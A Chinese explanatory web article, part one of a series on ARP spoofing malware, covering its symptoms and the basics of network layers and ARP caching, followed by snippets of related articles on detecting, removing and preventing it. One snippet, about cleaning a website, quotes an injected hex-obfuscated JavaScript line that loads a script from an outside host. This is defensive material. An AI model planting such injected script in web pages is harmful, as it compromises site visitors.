专家解读ARP病毒(一)

一、ARP病毒

ARP地址欺骗类病毒(以下简称ARP病毒)是一类特殊的病毒,该病毒一般属于木马(Trojan)病毒,不具备主动传播的特性,不会自我复制。但是由于其发作的时候会向全网发送伪造的ARP数据包,干扰全网的运行,因此它的危害比一些蠕虫还要严重得多。

二、ARP病毒发作时的现象

网络掉线,但网络连接正常,内网的部分PC机不能上网,或者所有电脑不能上网,无法打开网页或打开网页慢,局域网时断时续并且网速较慢等。

三、ARP病毒原理

3.1 网络模型简介

众所周知,按照OSI (Open Systems Interconnection Reference Model 开放系统互联参考模型) 的观点,可将网络系统划分为7层结构,每一个层次上运行着不同的协议和服务,并且上下层之间互相配合,完成网络数据交换的功能,如图1:

图1 OSI网络体系模型

然而,OSI的模型仅仅是一个参考模型,并不是实际网络中应用的模型。实际上应用最广泛的商用网络模型即TCP/IP体系模型,将网络划分为四层,每一个层次上也运行着不同的协议和服务,如图2。

图2 TCP/IP四层体系模型及其配套协议

上图中,蓝色字体表示该层的名称,绿色字表示运行在该层上的协议。由图2可见,我们即将要讨论的ARP协议,就是工作在网际层上的协议。

3.2 ARP协议简介

我们大家都知道,在局域网中,一台主机要和另一台主机进行通信,必须要知道目标主机的IP地址,但是最终负责在局域网中传送数据的网卡等物理设备是不识别IP地址的,只能识别其硬件地址即MAC地址。MAC地址是48位的,通常表示为12个16进制数,每2个16进制数之间用“-”或者冒号隔开,如:00-0B-2F-13-1A-11就是一个MAC地址。每一块网卡都有其全球唯一的MAC地址,网卡之间发送数据,只能根据对方网卡的MAC地址进行发送,这时就需要一个将高层数据包中的IP地址转换成低层MAC地址的协议,而这个重要的任务将由ARP协议完成。

ARP全称为Address Resolution Protocol,地址解析协议。所谓“地址解析”就是主机在发送数据包前将目标主机IP地址转换成目标主机MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。 这时就涉及到一个问题,一个局域网中的电脑少则几台,多则上百台,这么多的电脑之间,如何能准确的记住对方电脑网卡的MAC地址,以便数据的发送呢?这就涉及到了另外一个概念,ARP缓存表。在局域网的任何一台主机中,都有一个ARP缓存表,该表中保存这网络中各个电脑的IP地址和MAC地址的对照关系。当这台主机向同局域网中另外的主机发送数据的时候,会根据ARP缓存表里的对应关系进行发送。

时间: 2024-10-31 21:46:55

专家解读ARP病毒(一)的相关文章

专家解读ARP病毒(完)

[编者按:前文,我们讲述了对ARP病毒电脑的查杀方法,这里是本系列文章的最后一篇,将告诉大家如何采取措施对ARP病毒免疫.] 七.ARP病毒的网络免疫措施 由于ARP病毒的种种网络特性,可以采用一些技术手段进行网络中ARP病毒欺骗数据包免疫.即便网络中有ARP中毒电脑,在发送欺骗的ARP数据包,其它电脑也不会修改自身的ARP缓存表,数据包始终发送给正确的网关,用的比较多的办法是"双向绑定法" . 双向绑定法,顾名思义,就是要在两端绑定IP-MAC地址,其中一端是在路由器中,把所有PC的

专家解读ARP病毒(四)

[编者按:前文,我们讲述了对中了ARP病毒电脑的定位方法,这里我们向大家介绍对ARP病毒电脑的查杀方法.] 六.ARP病毒电脑的查杀方法 通过上述的方法,已经找到了ARP中毒电脑,那么接下来的操作就是如何杀毒了.有一点需要注意的是:当找到中毒电脑后,应该立即拔掉中毒电脑的网线,以免其继续发包干扰全网的运行. 对于ARP病毒电脑的查杀办法,首先可以利用杀毒软件杀毒,但是由于现在病毒变种极其繁多,有可能遇到杀毒软件查不出来的情况,这时候就需要借助手工杀毒的办法了,下面介绍一些经验. 根据一些经验,较

专家解读ARP病毒(三)

[编者按:前文,我们讲述了ARP病毒新的表现形式及相关案例,这里我们向大家介绍对中了ARP病毒电脑的定位方法.] 五.ARP病毒电脑的定位方法 下面,又有了一个新的课题摆在我们面前:如何能够快速检测定位出局域网中的ARP病毒电脑? 面对着局域网中成百台电脑,一个一个地检测显然不是好办法.其实我们只要利用ARP病毒的基本原理:发送伪造的ARP欺骗广播,中毒电脑自身伪装成网关的特性,就可以快速锁定中毒电脑.可以设想用程序来实现以下功能:在网络正常的时候,牢牢记住正确网关的IP地址和MAC地址,并且实

专家解读ARP病毒(二)

[编者按:前文,我们讲述了ARP病毒的原理,这里我们向大家介绍ARP病毒新的表现形式及相关案例.] 四.ARP病毒新的表现形式 由于现在的网络游戏数据包在发送过程中,均已采用了强悍的加密算法,因此这类ARP病毒在解密数据包的时候遇到了很大的难度.现在又新出现了一种ARP病毒,与以前的一样的是,该类ARP病毒也是向全网发送伪造的ARP欺骗广播,自身伪装成网关.但区别是,它着重的不是对网络游戏数据包的解密,而是对于HTTP请求访问的修改. HTTP是应用层的协议,主要是用于WEB网页访问.还是以上面

ARP病毒反复发作 反病毒专家支六招彻底防范

[搜狐IT消息]7月23日,"我曾经中了ARP病毒,为什么第一次中了后就会反复发作,即使清除干净后过一段时间后又出现了?有没有什么有效的清除方法?"近日,很多电脑用户提出类似问题,由于清除此类病毒异常困难,用户迫切希望能够了解怎样才能彻底防范此类病毒. 据江民反病毒专家介绍,ARP病毒发作时,通常会造成网络掉线,但网络连接正常,内网的部分电脑不能上网,或者所有电脑均不能上网,无法打开网页或打开网页慢以及局域网连接时断时续并且网速较慢等现象,严重影响到企业网络.网吧.校园网络等局域网的正

如何清理网站被arp病毒插入js恶意代码?

网页被插入如下的arp病毒的js恶意代码script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\... 首先确定你的服务器上原文件  是否有这些代码 就是

如何清除局域网中的ARP病毒

现在局域网中感染ARP病毒的情况比较多,清理和防范都比较困难,给不少的网络管理员造成了很多的困扰.下面就是个人在处理这个问题的一些经验,同时也在网上翻阅了不少的参考资料. ARP病毒的症状 有时候无法正常上网,有时候有好了,包括访问网上邻居也是如此,拷贝文件无法完成,出现错误:局域网内的ARP包爆增,使用ARP查询的时候会发现不正常的MAC地址,或者是错误的MAC地址对应,还有就是一个MAC地址对应多个IP的情况也会有出现. ARP攻击的原理 ARP欺骗攻击的包一般有以下两个特点,满足之一可视为

如何清除arp病毒

有关ARP病毒问题的处理说明: 故障现象 :机器以前可正常上网的,突然出现可认证,不能上网的现象(无法ping通网关),重启机器或在MSDOS窗口下运行命令ARP -d后,又可恢复上网一段时间. 故障原因:这是APR病毒欺骗攻击造成的. 引起问题的原因一般是由传奇外挂携带的ARP木马攻击.当在局域网内使用上述外挂时,外挂携带的病毒会将该机器的MAC地址映射到网关的IP地址上,向局域网内大量发送ARP包,从而致使同一网段地址内的其它机器误将其作为网关,这就是为什么掉线时内网是互通的,计算机却不能上

如何手动查杀局域网ARP病毒

由于arp防火墙是基于应用层的,所以对局域网arp病毒仍是束手无策,前些时候邻居(同一局域网)告诉我他的电脑总是提示我对他进行攻击.不光是我,其他用户也是在互相的攻击,经常搞的网络性能恶劣下降,无奈之下很多邻居重做了系统,可我那里有那功夫去费这么大的劲折腾,只好自己动手杀毒了.具体步骤如下: 1.删除 "病毒组件释放者"程序: 我用的系统是window xp ,在系统目录下找到:"C:\WINDOWS\System32\LOADHW.EXE" 2.删除 "